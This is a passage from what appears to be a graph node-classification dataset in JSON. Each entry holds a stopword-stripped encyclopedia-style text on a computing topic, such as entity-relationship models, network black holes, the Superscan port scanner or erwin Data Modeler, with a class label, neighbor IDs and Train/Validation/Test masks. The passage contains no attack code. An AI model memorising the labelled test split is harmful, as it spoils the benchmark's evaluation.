sale car service concept customer transaction order exist logically—as concept although term entity one commonly used following chen really distinguish entity entity-type entity-type category entity strictly speaking instance given entity-type usually many instances entity-type term entity-type somewhat cumbersome people tend use term entity synonym term entities thought nouns examples computer employee song mathematical theorem etc relationship captures entities related one another relationships thought verbs linking two nouns examples owns relationship company computer supervises relationship employee department performs relationship artist song proves relationship mathematician conjecture etc model linguistic aspect described utilized declarative database query language errol mimics natural language constructs errol semantics implementation based reshaped relational algebra rra relational algebra adapted entity–relationship model captures linguistic aspect entities relationships attributes examples employee entity might social security number ssn attribute proved relationship may date attribute every entity unless weak entity must minimal set uniquely identifying attributes called entity primary key entity–relationship diagrams n't show single entities single instances relations rather show entity sets entities entity type relationship sets relationships relationship type examples particular song entity collection songs database entity set eaten relationship child lunch single relationship set child-lunch relationships database relationship set words relationship set corresponds relation mathematics relationship corresponds member relation certain cardinality constraints relationship sets may indicated well chen proposed following rules thumb mapping natural language descriptions er diagrams english chinese er diagrams peter chen physical view show data actually stored chen original paper gives example relationship roles describes relationship marriage two roles husband wife person plays role husband marriage relationship another person plays role wife marriage words nouns surprise naming things requires noun chen terminology also applied earlier ideas lines arrows crow's-feet diagrams owes earlier bachman diagrams chen relationship diagrams another common extension chen model name relationships roles verbs phrases also become prevalent name roles phrases owner owned correct nouns case owner possession thus person plays role owner car plays role possession rather person plays role owner etc use nouns direct benefit generating physical implementations semantic models person two relationships car possible generate names owner_person driver_person immediately meaningful modifications original specification beneficial chen described look-across cardinalities aside barker–ellis notation used oracle designer uses same-side minimum cardinality analogous optionality role look-across maximum cardinality crows foot merise elmasri navathe others preference same-side roles minimum maximum cardinalities recent researchers feinerer dullea et al shown coherent applied n-ary relationships order greater 2 dullea et al one reads 'look across notation used uml effectively represent semantics participation constraints imposed relationships degree higher binary feinerer says problems arise operate look-across semantics used uml associations hartmann investigates situation shows different transformations fail although reduction mentioned spurious two diagrams 3.4 3.5 fact also see next pages look-across interpretation introduces several difficulties prevent extension simple mechanisms binary n-ary associations attributes drawn ovals connected line exactly one entity relationship set cardinality constraints expressed follows attributes often omitted clutter diagram diagram techniques often list entity attributes within rectangles drawn entity sets related diagramming convention techniques crow foot notation beginning dates back article gordon everest 1976 used barker notation structured systems analysis design method ssadm information technology engineering crow foot diagrams represent entities boxes relationships lines boxes different shapes ends lines represent relative cardinality relationship crow foot notation used consultancy practice caci many consultants caci including richard barker subsequently moved oracle uk developed early versions oracle case tools introducing notation wider audience notation relationships attributes necessary relationships promoted entities right example necessary capture artist performed song new entity performance introduced attributes reflecting time place relationship artist song becomes indirect relationship via performance artist-performs-performance performance-features-song three symbols used represent cardinality symbols used pairs represent four types cardinality entity may relationship inner component notation represents minimum outer component represents maximum using modeled database users encounter two well known issues returned results mean something results assumed query author first 'fan trap occurs master table links multiple tables one-to-many relationship issue derives name way model looks drawn entity–relationship diagram linked tables 'fan master table type model looks similar star schema type model used data warehouses trying calculate sums aggregates using standard sql master table unexpected incorrect results solution either adjust model sql issue occurs mostly databases decision support systems software queries systems sometimes includes specific methods handling issue second issue 'chasm trap chasm trap occurs model suggests existence relationship entity types pathway exist certain entity occurrences example building one-or-more rooms hold zero-or-more computers one would expect able query model see computers building however computers currently assigned room repair somewhere else shown list another relation building computers needed capture computers building last modelling issue result failure capture relationships exist real world model see entity-relationship modelling 2 details semantic model model concepts sometimes called platform independent model intensional model latest since carnap well known extensional model one maps elements particular methodology technology thus platform specific model uml specification explicitly states associations class models extensional fact self-evident considering extensive array additional adornments provided specification provided prior candidate semantic modelling languages uml data modeling notation part 2 peter chen father er modeling said seminal paper original 1976 article chen explicitly contrasts entity–relationship diagrams record modelling techniques several authors also support chen program chen accord philosophic theoretical traditions time ancient greek philosophers socrates plato aristotle 428 bc modern epistemology semiotics logic peirce frege russell plato associates knowledge apprehension unchanging forms forms according socrates roughly speaking archetypes abstract representations many types things properties relationships one another",
    "neighbors": [
      5632,
      8201,
      4107,
      10258,
      2585,
      5151,
      8742,
      1076,
      4155,
      11324,
      9286,
      72,
      11339,
      7767,
      7775,
      11362,
      8291,
      9828,
      8808,
      4713,
      2681,
      1146,
      3196,
      2688,
      9345,
      9351,
      1697,
      5808,
      10418,
      9397,
      3768,
      7868,
      5827,
      11472,
      9942,
      7392,
      10471,
      2283,
      6383,
      9467,
      6395,
      9481,
      10505,
      10518,
      4376,
      7968,
      290,
      1314,
      7461,
      4393,
      6454,
      9527,
      4412,
      4416,
      5441,
      8518,
      10061,
      853,
      2901,
      11098,
      347,
      860,
      8539,
      2413,
      9079,
      10617,
      4483,
      10628,
      2456,
      9112,
      9631,
      5550,
      9147,
      3004,
      9661,
      9663,
      6085,
      3529,
      2512,
      9177,
      987,
      9183,
      7650,
      11242,
      9710,
      10737,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11458,
    "label": 2,
    "text": "Network_redirector:network redirector dos windows network redirector redirector operating system driver sends data receives data remote device network redirector provides mechanisms locate open read write delete files submit print jobs provides application services named pipes mailslots application needs send receive data remote device sends call redirector redirector provides functionality presentation layer osi model networks hosts communicate use client software shells redirectors requesters microsoft networking network redirectors implemented installable file system ifs drivers",
    "neighbors": [
      3235,
      8301,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11459,
    "label": 2,
    "text": "Dru_Lavigne:dru lavigne dru lavigne network systems administrator instructor technical writer director freebsd foundation using freebsd since 1996 authored several bsd books spent 10 years developing training materials providing training administration freebsd systems prolific author written o'reilly techrepublic dnsstuff openlogic contributed linux hacks hacking linux exposed author bsd hacks best freebsd basics third latest book definitive guide pc-bsd released march 2010 decade experience administering teaching netware microsoft cisco checkpoint sco solaris linux bsd systems writes widely read technical blog year life bsd guru toolbox.com founder current chair bsd certification group inc. non-profit organization mission create standard certifying bsd system administrators also community manager pc-bsd freenas projects making responsible dealing issues relating community relations administration various forums also principal author executive editor documentation projects since 22 january 2013 committer category doc freebsd project",
    "neighbors": [
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      9625,
      1946,
      4636,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      9009,
      11698,
      11573,
      1718,
      9784,
      1465,
      5177,
      5819,
      3006,
      9927,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      10202,
      607,
      3551,
      7521,
      1891,
      998,
      4073,
      8816,
      2545,
      3058,
      7027,
      9201,
      2421,
      9844,
      11506,
      2424,
      1273,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11460,
    "label": 3,
    "text": "Valis:_The_Fantasm_Soldier:valis fantasm soldier also known either valis fantasm soldier video game developed wolf team published telenet japan 1986 originally pc-88 msx home computers ported remade re-released several systems years first video game valis series stars japanese teenager named yuko uses mystical sword called valis defend earth worlds critical reception varied depending version including critical acclaim 1992 pc engine remake original pc-88 msx version valis fantasm soldier side-scrolling platform game wielding game titular sword main character fights level enemies jumping across ledges confronts boss end level certain points game gameplay pauses cinematic cutscenes regarding game storyline play also gameplay-tweaked content-cut version fm-7 family computer famicom side-scrolling action role-playing game version valis differs considerably versions game basic plot remains gameplay moved linear stage design larger maze-style levels multiple paths often questionable design resulting high difficulty level especially since neither password save system mega drive/genesis remake features gameplay system similar later games series particular valis iii like side-scrolling games era four d-pad buttons move character three fire buttons perform three actions main character sliding jumping swinging sword upgraded three stages alternative firing modes player also use magic spells gaining defeating bosses pc engine remake features improvements gameplay system single high jumps instead two-phase jumps sliding move damaging enemies voiced cutscenes mobile remake added new stages alternate costumes voiced sumi shimamoto schoolgirl late 1980s japan fated protect three different realms – earth land spirits vecanti dream world – wielding mystical sword known valis demon lord voiced hideyuki tanaka extinguishes light vecanti functions source power live desperate plea salvation queen voiced yoshiko sakakibara reaches brave soul help time despair yuko earth one answers call summoned magical forces vecanti liberate evil rogles brainwashes yūko classmate girlfriend voiced yūko mita helping try put end valis warrior increasingly difficult odds yuko prevails although reiko killed process memory returns dies yuko arms original pc-88 msx developed wolf team published telenet japan tokuma shoten would later develop release almost completely redone version famicom 1987 japan 1991 telenet renovation united states released versions mega drive/genesis developed riot enhanced remake mega drive version also developed riot released telenet pc engine super cd-rom² add-on 1992 2005-2006 bandai namco released another remake game time mobile phone platforms japan project egg released various emulated versions game windows along compilation complete plus came soundtrack cd figure pc engine version released konami playstation store 2010 2014 given free japanese subscribers playstation network service short promotional anime sunrise directed hideaki anno katsuhiko nishijima featuring music kohei tanaka released 1987 vhd attached issue anime vision magazine artist pixel responsible game character design also published three doujinshi books orchestral arrangement game soundtrack released 2011 also one video games adapted kouta hirano manga titled published gamest comics collection april 1999 sam derboo hardcore gaming 101 wrote original versions might horrible unplayable mess call fame begin n't gameplay pioneering cinematic cutscenes two years even ninja gaiden ... left quite excellent chiptune music really part original valis worth remembered derboo described family computer version typical famicom action rpg competently executed super obfuscate endlessly frustrating nevertheless msx club highly recommended msx version excellent action game even arcades gave score 9/20 mega drive genesis remake received rather mediocre mostly positive review scores west including 65 sega visions 76 consoles+ 65 joystick 5/10 asm hardcore gaming 101 derboo opined valis genesis n't bad game definitely leagues original still particularly enjoyable slow boring sega force bashed dull repetitive gameplay declared high graphical content low playability level valis nutshell hand pc engine turbografx version valis acclaimed critics review scores included 81 consoles 78 génération 4 77 joypad 83 joystick according hardcore gaming 101 mechanics level design doubt well-executed game entire series still bit derivative pedestrian counted among genre greats like castlevania ninja gaiden least high second tier retro gamer highlighted arguable best entry great series lucas m. thomas ign included valis among top ten unreleased turbografx games 're kind gamer likes know exact color panties worn platforming hero girls valis want invest time game followed three sequels valis ii valis iii valis iv eroge spin-off valis x two manga series",
    "neighbors": [
      5548,
      6797,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 11461,
    "label": 4,
    "text": "Black_hole_(networking):black hole networking networking black holes refer places network incoming outgoing traffic silently discarded dropped without informing source data reach intended recipient examining topology network black holes invisible detected monitoring lost traffic hence name common form black hole simply ip address specifies host machine running address host assigned even though tcp/ip provides means communicating delivery failure back sender via icmp traffic destined addresses often dropped note dead address undetectable protocols connectionless unreliable e.g. udp connection-oriented reliable protocols tcp rudp either fail connect dead address fail receive expected acknowledgements firewalls routers household use configured silently discard packets addressed forbidden hosts ports resulting small large black holes network personal firewalls respond icmp echo requests ping designated vendors stealth mode despite networks ip addresses hosts firewalls configured way easily distinguished invalid otherwise unreachable ip addresses encountering latter router generally respond icmp network rsp host unreachable error nat used home office routers generally effective way obscuring layout internal network null route black hole route network route routing table entry goes nowhere matching packets dropped ignored rather forwarded acting kind limited firewall act using null routes often called blackhole filtering rest article deals null routing internet protocol ip black hole filtering refers specifically dropping packets routing level usually using routing protocol implement filtering several routers often dynamically respond quickly distributed denial-of-service attacks remote triggered black hole filtering rtbh technique provides ability drop undesirable traffic enters protected network internet exchange ix provider usually acquires technology help members participants filter attack null routes typically configured special route flag also implemented forwarding packets illegal ip address 0.0.0.0 loopback address null routing advantage classic firewalls since available every potential network router including modern operating systems adds virtually performance impact due nature high-bandwidth routers null routing often sustain higher throughput conventional firewalls reason null routes often used high-performance core routers mitigate large-scale denial-of-service attacks packets reach bottleneck thus avoiding collateral damage ddos attacks — although target attack inaccessible anyone blackhole filtering also abused malicious attackers compromised routers filter traffic destined certain address routing typically works internet protocol layer limited packet classification bound stateless due nature ip routers typically classification limited destination ip address prefix source ip address incoming network interface dns-based blackhole list dnsbl real-time blackhole list rbl list ip addresses published internet domain name system dns either zone file used dns server software live dns zone queried real-time dnsbls often used publish addresses computers networks linked spamming mail server software configured reject flag messages sent site listed one lists term blackhole list sometimes interchanged term blacklist blocklist dnsbl software mechanism rather specific list policy dozens dnsbls existence use wide array criteria listing delisting addresses may include listing addresses zombie computers machines used send spam listing addresses isps willingly host spammers listing addresses sent spam honeypot system since creation first dnsbl 1997 operation policies lists frequently controversial internet advocacy occasionally lawsuits many email systems operators users consider dnsbls valuable tool share information sources spam others including prominent internet activists objected form censorship addition small number dnsbl operators target lawsuits filed spammers seeking lists shut altogether firewalls incorrectly discard icmp packets including ones needed path mtu discovery work correctly causes tcp connections from/to/through hosts lower mtu hang black hole e-mail address e-mail address valid messages sent generate errors messages sent automatically deleted never stored seen humans addresses often used return addresses automated e-mails",
    "neighbors": [
      5472,
      5536,
      8224,
      9251,
      2884,
      8998,
      2887,
      1512,
      2409,
      7817,
      8073,
      9256,
      8753,
      11413,
      3032,
      5402,
      5531,
      9117
    ],
    "mask": "None"
  },
  {
    "node_id": 11462,
    "label": 3,
    "text": "Yamaha_V9938:yamaha v9938 yamaha v9938 video display processor vdp used msx2 home computer well geneve 9640 enhanced ti-99/4a clone yamaha v9938 also known msx-video vdp video display processor successor texas instruments tms9918 used msx1 various systems v9938 turn succeeded yamaha v9958 msx screen modes often referred assigned number msx-basic mapping follows v9938 programmer guide http //rs.gr8bit.ru/documentation/v9938-programmers-guide.pdf",
    "neighbors": [
      4257,
      10658,
      1958,
      7591,
      8198,
      11564,
      9006,
      7536,
      10676,
      1403,
      11261,
      5502,
      11487
    ],
    "mask": "Test"
  },
  {
    "node_id": 11463,
    "label": 7,
    "text": "ComputerSupport.com:computersupport.com stratuspointit formerly known computersupport.com technology knowledge customer service based company located natick massachusetts since 2006 stratuspointit managed services systems management support firm provides platform cloud computing network monitoring outsourcing services across various locations united states stratuspointit serves industries legal financial manufacturing sectors computersupport.com founded 2006 immigrants united states kirill bensonoff alexandric ho founders professional consultants focused network planning design microsoft technologies prior founding stratuspointit founders met working insight enterprises company originally organized spirinet technology services llc renamed computersupport.com later stratuspointit 2013 conjunction citrix systems computersupport released next generation itanywhere cloud service october 2014 computersupport.com acquired vp solutions inc framingham massachusetts.the company noted market position cloud computingand desktop servicespaces 2015 computersupport.com influenced launch unigma application aimed helping csps cloud service providers companies monitor iaas clouds unigma acquired kaseya 2017 2016 computersupport.com launched noc solution — dubbed itanywhere noc — middle market enterprises noc offers around-the-clock network server cloud monitoring escalation remediation services computersupport.com organized following business units",
    "neighbors": [
      4194,
      5371
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11464,
    "label": 4,
    "text": "Superscan:superscan superscan free connect-based port scanning software designed detect open tcp udp ports target computer determine services running ports run queries whois ping icmp traceroute hostname lookups superscan 4 completely rewritten update superscan version 3 released 2000 features windows enumeration list variety important information dealing microsoft windows superscan tool used system administrators crackers script kiddies evaluate computer security system administrators use test possible unauthorized open ports computer networks whereas crackers use scan potentially insecure port order gain illegal access system",
    "neighbors": [
      8204,
      6797,
      10924,
      7983,
      11249,
      8692,
      11413,
      7031,
      5402,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 11465,
    "label": 4,
    "text": "Enterprise_Archive_Solution:enterprise archive solution enterprise archive solution eas enterprise file social media email archiving software program originally developed educom 2000 eas subsequently acquired zantaz autonomy hp currently owned capax discovery enterprise archive solution ability archive content various sources microsoft exchange microsoft sharepoint various file systems ntfs social media twitter facebook instant messaging microsoft skype enterprise archive solution eas previously called exchange archive solution originally developed educom ts inc. ottawa-based software development firm first release eas occurred march 15 2000 eas sold commercial software local installation eas designed archive content microsoft exchange help organizations comply legal requirements e-mail retention reduce storage load microsoft exchange improve backup .pst file management 2000 2004 educom released multiple new versions gained market share eventually acquired zantaz inc. 2004 next year zantaz added additional functionality released version 4.0 officially renamed product enterprise archive solution 2005 eas used 2 million users globally leading solution archiving market characterized analyst idc 2007 zantaz customers included 9 10 top global law firms 11 fortune 25 14 top 20 financial securities firms july 24 2007 eas acquired autonomy inc. cambridge uk shortly acquisition autonomy announced eas integrated autonomy ’ idol search technology analyst gartner repeatedly rated zantaz autonomy archiving solution one top three market october 3 2011 eas acquired hp inc. palo alto ca july 29 2014 eas acquired capax discovery inc. headquartered morristown nj website archiving solution windows file servers",
    "neighbors": [
      2193,
      5571,
      1638
    ],
    "mask": "Test"
  },
  {
    "node_id": 11466,
    "label": 1,
    "text": "Indexed_Database_API:indexed database api indexed database api commonly referred indexeddb javascript application programming interface api provided web browsers managing nosql database json objects standard maintained world wide web consortium w3c alternative web storage standard indexeddb provide storage capacity web storage fixed limits per website indexeddb limits usually quite large exist use cases indexeddb include caching web application data offline availability browser modules devtools extensions may also use storage support indexeddb added firefox version 4 google chrome version 11 internet explorer version 10 safari eventually added support version 8 web sql database prior api developed apple firefox refused add support argued becoming standard would codify quirks sqlite thus deprecated favor indexeddb",
    "neighbors": [
      513,
      6657,
      9736,
      9229,
      2579,
      1556,
      6171,
      9757,
      7713,
      10791,
      9770,
      7212,
      10284,
      559,
      4658,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      7784,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      124,
      637,
      1664,
      2182,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7885,
      11469,
      9424,
      4310,
      2777,
      5849,
      8923,
      6366,
      737,
      4326,
      8443,
      9987,
      7943,
      1802,
      10506,
      278,
      7965,
      10020,
      1834,
      10026,
      10057,
      11082,
      2893,
      3920,
      2901,
      865,
      8557,
      6528,
      3971,
      3462,
      8584,
      11154,
      7572,
      5026,
      5546,
      944,
      2485,
      1468,
      5054,
      8644,
      6086,
      4048,
      5078,
      5593,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      8689,
      6133,
      5622,
      5114,
      9726
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11467,
    "label": 0,
    "text": "Open_information_extraction:open information extraction natural language processing open information extraction oie task generating structured machine-readable representation information text usually form triples n-ary propositions proposition understood truth-bearer textual expression potential fact e.g. dante wrote divine comedy represented amenable structure computers e.g. dante wrote divine comedy oie extraction normally consists relation set arguments instance dante passed away ravenna proposition formed relation passed away arguments dante ravenna first argument usually referred subject second considered object extraction said textual representation potential fact elements linked knowledge base furthermore factual nature proposition yet established example transforming extraction full fledged fact would first require linking possible relation arguments knowledge base second truth extraction would need determined computer science transforming oie extractions ontological facts known relation extraction fact oie seen first step wide range deeper text understanding tasks relation extraction knowledge-base construction question answering semantic role labeling extracted propositions also directly used end-user applications structured search e.g. retrieve propositions dante subject oie first introduced textrunner developed university washington turing center headed oren etzioni methods introduced later reverb ollie clausie csd helped shape oie task characterizing aspects high level approaches make use set patterns generate extractions depending particular approach patterns either hand-crafted learned reverb suggested necessity produce meaningful relations accurately capture information input text instance given sentence faust made pact devil would erroneous produce extraction faust made pact since would adequately informative precise extraction would faust made pact devil reverb also argued generation overspecific relations ollie stressed two important aspects oie first pointed lack factuality propositions instance sentence like john studies hard pass exam would inaccurate consider john pass exam fact additionally authors indicated oie system able extract non-verb mediated relations account significant portion information expressed natural language text instance sentence obama former us president born hawaii oie system able recognize proposition obama former us president clausie introduced connection grammatical clauses propositions oie extractions authors stated grammatical clause expresses proposition verb mediated proposition identified solely recognizing set clauses expressed sentence implies correctly recognize set propositions input sentence necessary understand grammatical structure authors studied case english language admits seven clause types meaning identification proposition requires defining seven grammatical patterns finding also established separation recognition propositions materialization first step proposition identified without consideration final form domain-independent unsupervised way mostly based linguistic principles second step information represented according requirements underlying application without conditioning identification phase consider sentence albert einstein born ulm died princeton first step recognize two propositions albert einstein born ulm albert einstein died princeton information correctly identified propositions take particular form required underlying application e.g. albert einstein born ulm albert einstein died princeton csd introduced idea minimality oie considers computers make better use extractions expressed compact way especially important sentences subordinate clauses cases csd suggests generation nested extractions example consider sentence embassy said 6,700 americans pakistan csd generates two extractions 6,700 americans pakistan ii embassy said usually known reification",
    "neighbors": [
      3617,
      11538
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11468,
    "label": 5,
    "text": "VTun:vtun vtun networking application set virtual tunnels tcp/ip networks supports internet protocol ip point-to-point protocol ppp serial line internet protocol slip protocols exists reference implementation tun/tap user-space tunnel driver included linux kernel version 2.4 also originally developed maxim krasnyansky bishop clark current maintainer like applications nature vtun creates single connection two machines multiplexes traffic vtun connections initiated via tcp connection client server server initiates udp connection client udp protocol requested software allows creation tunnels routing traffic manner similar ppp well bridge-friendly ethertap connection vtun uses private shared key negotiate handshake via challenge response continual source concern target one strongly worded security assessment vtun server client binary applications completely built without encryption support binaries used encryption endpoints simple xor cipher completely trivial decode type build supported developers",
    "neighbors": [
      1030,
      10889,
      9722,
      8211,
      11162,
      3742,
      9764,
      4268,
      3629,
      7983,
      10417,
      7859,
      2228,
      823,
      3777,
      2884,
      5959,
      8265,
      7376,
      6993,
      11606,
      2136,
      9048,
      6490,
      6364,
      5084,
      5472,
      10210,
      9318,
      8039,
      8432,
      11248,
      5749,
      3322
    ],
    "mask": "Test"
  },
  {
    "node_id": 11469,
    "label": 5,
    "text": "Opera_Mobile:opera mobile opera mobile mobile web browser smartphones tablets pdas developed opera software first devices run mobile edition opera psion series 5 psion series 5mx psion series 7 psion netbook ran opera mobile 3.6 released 2000 opera mobile ported windows mobile operating system 2003 opera mobile used presto layout engine version 15 replaced webkit|webkit blink layout engine |blink supports many web standards well ajax programming |ajax version 9.7 use opera turbo compresses web pages via opera software turbo servers thus reducing download size web pages compressed page loading times improved bandwidth consumption reduced 80 browser dynamically reformat web page small screen using opera small screen rendering ssr technology word wrap|text-wrapping opera mobile 10 includes features opera web browser speed dial|speed dial feature allows user add links shown thumbnail images page displayed new tab opened set feature allows user easily navigate selected web pages tab gui |visual tabs allow browsing multiple web sites one time also includes password manager pop-up ad|pop-up handler supports copy paste autocomplete|address auto-complete page zooming|zooming history bookmark web |bookmarks removed opera mobile 15 browser used either using finger-touch stylus touchscreen keypad displayed portrait landscape mode category opera software|mobile category mobile web browsers category pocket pc software category symbian software category android web browsers category windows internet software de opera opera mobile opera browser opera mobile ro opera navigator web opera mobile pentru dispozitive mobile",
    "neighbors": [
      1664,
      2945,
      6528,
      3971,
      6657,
      3462,
      7943,
      8584,
      1802,
      2579,
      7572,
      6685,
      7965,
      8351,
      10910,
      5026,
      1834,
      9770,
      7340,
      11693,
      559,
      2611,
      9908,
      4661,
      3639,
      11449,
      9275,
      4797,
      64,
      9408,
      10057,
      11466,
      5707,
      7885,
      7246,
      4048,
      10834,
      4310,
      5078,
      6231,
      2139,
      6747,
      6748,
      8923,
      737,
      5605,
      4326,
      487,
      8169,
      1642,
      9834,
      8557,
      494,
      1520,
      7152,
      115,
      5875,
      4725,
      9843,
      4728,
      5114,
      8443,
      1533
    ],
    "mask": "Train"
  },
  {
    "node_id": 11470,
    "label": 4,
    "text": "Cross-domain_solution:cross-domain solution cross-domain solution cds means information assurance provides ability manually automatically access transfer information two differing security domains integrated systems hardware software enable transfer information among incompatible security domains levels classification modern military intelligence law enforcement operations critically depend timely sharing information cds distinct rigorous approaches supports transfer would otherwise precluded established models computer network data security e.g. bell–lapadula model clark–wilson model cds development assessment deployment based risk management goal cds allow isolated critical network exchange information others without introducing security threat normally comes network connectivity three primary elements demanded cross domain solutions acceptance criteria information transfer across domains cross-domain interoperability may simple e.g antivirus scanning transfer low high security domains complex e.g multiple human reviewers must examine approve document release high security domain one-way data transfer systems one-way traffic systems data diodes often used move information low security domains secret enclaves assuring information escape cross-domain solutions often include high assurance guard get good foundation cross domain solution deployment visit disa mission partners website watch following instructional videos • cds 101 cbt 11 minutes • cds cap cbt 12 minutes • dsawg 101 cbt 17 minutes though cross-domain solutions 2019 historically typical military intelligence law enforcement environments also use case cross domain solutions industry many industrial settings control systems analytic systems different security domains one example flight control infotainment systems airliner given wide variety use cases industry different levels third party accreditation certification aspects cross-domain solution appropriate different applications found among different providers previous decades multilevel security mls technologies developed implemented enabled objective deterministic security left little wiggle room subjective discretionary interpretation enforced mandatory access control mac near certainty rigidity prevented simpler solutions would seem acceptable surface automated information systems enabled extensive information sharing sometimes contrary need avoid sharing secrets adversaries need information sharing led need depart rigidity mac favor balancing need protect need share ‘ balance ’ decided discretion users access control called discretionary access control dac tolerant actions manage risk mac requires risk avoidance allowing users systems manage risk sharing information way contrary original motivation mac unintended consequences sharing complex analyze necessarily left discretion users may narrow focus critical need documents provide standards guidance risk management unified cross domain management office ucdmo cross domain overlay 1 december 2011 ver 1.0 provides extensive security control guidance implement cds platform address security controls hardware software enforced advanced inspections",
    "neighbors": [
      10170,
      6337,
      2213,
      1350,
      3880,
      1225,
      11496,
      939,
      7979,
      10580,
      6110,
      10772,
      10968,
      2426,
      10204,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11471,
    "label": 3,
    "text": "Record_of_Lodoss_War:record lodoss war record lodoss war created 1986 group sne dungeons dragons replay serialized japanese magazine comptiq 1986 1988 though also used setting systems tunnels trolls runequest replays novels transcripts rpg sessions meant hold interest readers convey events took place proven popular even play role-playing games fans fiction including fantasy fiction similar light novels many characters parties replays become popular characters anime example character female elf deedlit record lodoss war played science fiction novelist hiroshi yamamoto rpg sessions popularity record lodoss war replays dungeon master ryo mizuno started adapt story earliest japanese-language domestic high fantasy novels 1988 replay series went become trilogy group sne abandon dungeons dragons rules create game dubbed record lodoss war companion released 1989 three parts replay series eventually published paperbacks kadokawa shoten 1989 1991 mizuno novelizations published kadokawa shoten 1988 1993 followed two collections short stories 1995 illustrations done yutaka izubuchi first volume forms basis first eight episodes record lodoss war ova series well record lodoss war grey witch manga series second also adapted manga form four-cd radio drama final five episodes ova series loosely based story told across third fourth novels caught ongoing novelization point feature original ending record lodoss war chronicles heroic knight tv series faithful adaptation volumes three seven first collection short stories adapted record lodoss war deedlit tale manga series mizuno later went pen two series novels prequel titled 1994 2002 5 volumes sequels 1993 1996 4 volumes 1998 2006 6 volumes prequel forms basis record lodoss war lady pharis manga series legend crystania adapted manga anime film ova series record lodoss war recounts adventures youth name parn son dishonored knight part motivation adventuring find happened father restore family honor despite inexperience parn considered leader accompanied childhood best friend etoh friend sometimes advisor slayn later slayn lover leylia newfound mentor ghim accompanied parn romantic interest high elf deedlit comes forest return seeking answer people isolationism end sees slow march extinction thief named woodchuck throughout series parn comes contact friends foes alike allies include king kashue king fahn shiris orson enemies include emperor beld ashram evil necromancer wagnard manga adaption anime derivative chronicles heroic knight continues adventures parn first eight episodes focuses spark adventures complete quest tasked onto protect neese daughter slayn leylia accompanied cast friends form leaf garrack greevus aldo ryna television series shares similarities plot ova wagnard seeking kidnap neese order use reagent resurrection naneel priestess avatar kardis slain leylia mother high priestess neese short time battle demonic god leylia reincarnation naneel lost virginity longer capable doorway reagent needed unseal naneel third series legend crystania places former villain ashram seat would-be hero placed spell god beast crystania series focuses pirotess dark elven lover tries find way free clutches spell restore back living self original ova series tv series released north america central park media vhs dvd ova tv series slated blu-ray release media blasters dropped plans re-release series april 14 2017 funimation announced license ova series chronicles heroic knight tv series released ova blu-ray dvd tv series dvd one set july 18 2017 japanese online game company gameon announced acquired global license make online game computers mobile phones based record lodoss war fantasy franchise kadokawa production slowcurve ryo mizuno novelist co-creator franchise serve supervisor development online game gameon plans release game outside japan gameon also said new game browser-based game record lodoss war online released february 2016 first three original stories novel series sold 10 million copies japan",
    "neighbors": [
      8081,
      2156,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 11472,
    "label": 1,
    "text": "Erwin_Data_Modeler:erwin data modeler erwin data modeler stylized erwin formerly erwin computer software data modeling originally developed logic works erwin since acquired series companies spun-off private equity firm parallax capital partners acquired incorporated separate entity erwin inc. managed ceo adam famularo software ’ engine based idef1x method although also supports diagrams displayed variant information technology engineering notation well dimensional modeling notation erwin created logic works based princeton new jersey may 1993 logic works released erwin/erx version tool designed work conjunction powerbuilder database models created using erwin could translated software built powerbuilder integrated development environment ide may 1995 logic works erwin expanded include several ides adding sqlwindows gupta technologies visual basic microsoft 1996 erwin among several data modeling software solutions used facilitate wide move client–server model database management 1998 logic works acquired platinum technology later acquired may 1999 computer associates ca erwin initially made part ca ’ jasmine suite later added new allfusion suite name allfusion erwin data modeler tool later renamed ca erwin data modeler 2014 embarcadero technologies sought acquire product ca inc acquisition blocked department justice anti-competitive concerns april 2016 parallax capital partners private equity firm acquired software ca technologies appointed adam famularo ceo company operates new name stylized erwin inc september 2016 erwin announced acquired corso british enterprise architecture service provider december year erwin acquired business process modeling software casewise plan integrate two 2017 erwin released data modeler nosql enterprise-class data modeling solution mongodb april 2018 nosql data modeling support couchbase added also year erwin launched data governance solution impact analysis integrations business process enterprise architecture data modeling suites january 2018 company acquired data harvesting technology data governance consulting services company p consulting also developed erwin edge software platform edge acronym “ enterprise data governance experience ” intending use data governance data-driven insights help accomplish organizational objectives february 2018 erwin released first state data governance report ubm august 2018 erwin acquired metadata management data governance company analytix ds core erwin computer-aided software engineering tool case tool users utilize erwin data modeler way take conceptual data model create logical data model dependent specific database technology schematic model used create physical data model users forward engineer data definition language required instantiate schema range database-management systems software includes features graphically modify model including dialog boxes specifying number entity–relationships database constraints indexes data uniqueness erwin supports three data modeling languages idef1x variant information technology engineering developed james martin form dimensional modeling notation software also allows users generate data models reverse-engineering pre-existing databases based several different formats another included feature erwin ’ ability create reusable design standards “ including naming standards data type standards model templates more. ” software includes several features modifying data model displayed including options several colors fonts diagrams subject areas layouts erwin ’ complete compare feature allows user compare two versions model displays differences allows merging updates either direction march 2016 software bundle also includes report designer erwin dm 2018 update included netezza mysql 8.x postgresql 10.4 hive model counts reports pii support 2019 update included db2 z/os v12 sql server 2017 teradata v16.20 postgresql 11.2 addition reporting enhancements like user-defined properties filters beginning 1992 united nations development programme undp one larger organizations utilize erwin integrate many independent databases located 120 field offices undp used erwin develop “ corporate data model ” goal “ reducing redundant data entry ” create single database framework based “ future systems designed ” erwin used reverse-engineer existing data field offices also move data computer associates ’ idms sybase ’ unixrdbms 2001 insurance company aetna used erwin data modeler automate maintenance database table definitions aetna ’ database consisted 15,000 table definitions became difficult maintain manually 2002 erwin among products used new york power authority software also use utah state office education 2006",
    "neighbors": [
      1856,
      11457,
      9286,
      3816,
      8808,
      6797,
